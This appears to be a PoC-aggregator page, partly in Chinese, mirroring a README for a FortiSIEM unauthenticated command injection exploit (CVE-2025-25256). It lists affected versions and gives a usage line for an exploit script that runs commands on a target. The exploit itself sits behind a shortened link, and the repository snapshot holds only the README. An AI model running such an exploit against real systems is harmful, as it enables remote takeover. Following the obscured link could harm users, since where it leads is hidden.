关联漏洞
标题:Fortinet FortiSIEM 操作系统命令注入漏洞 (CVE-2025-25256)Description:Fortinet FortiSIEM是美国飞塔(Fortinet)公司的一套安全信息和事件管理系统。该系统包括资产发现、工作流程自动化和统一管理等功能。 Fortinet FortiSIEM 7.3.0至7.3.1版本、7.2.0至7.2.5版本、7.1.0至7.1.7版本、7.0.0至7.0.3版本和6.7.9之前版本存在操作系统命令注入漏洞,该漏洞源于OS命令注入,可能导致执行任意代码。
Description
CVE-2025-25256: Fortinet FortiSIEM OS Command Injection CVE PoC (Proof of Concept)
介绍
# CVE-2025-25256 - Fortinet FortiSIEM Vulnerability
## Overview
This repository contains a proof-of-concept (POC) for a critical unauthenticated command injection security flaw (CVE-2025-25256) was recently identified in Fortinet FortiSIEM. The issue allows an attacker to remotely run commands on the system without logging in. The problem is tied to the phMonitor that listens on port 7900 and has been rated **9.8/10 in severity**.
## Impacted Versions
* FortiSIEM 6.1 – 6.6 (all versions)
* FortiSIEM 6.7.0 – 6.7.9
* FortiSIEM 7.0.0 – 7.0.3
* FortiSIEM 7.1.0 – 7.1.7
* FortiSIEM 7.2.0 – 7.2.5
* FortiSIEM 7.3.0 – 7.3.1
Fortinet has released fixed versions (7.3.2 and 7.4.0).
## Recommended Action
If you use FortiSIEM, you should ensure systems are upgraded to a patched version as soon as possible. Until then, limiting access to the affected service can reduce risk.
## Usage
```
python exploit.py -ip {ip} -port {port} -command "{cmd}"
```
Read thru the file for more info.
## Exploit
[Link](https://tinyurl.com/5n8hrhjm)
文件快照
[4.0K] /data/pocs/a37b4437b122eb4e7545c2cd4fa717723c8d24d4
└── [1.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。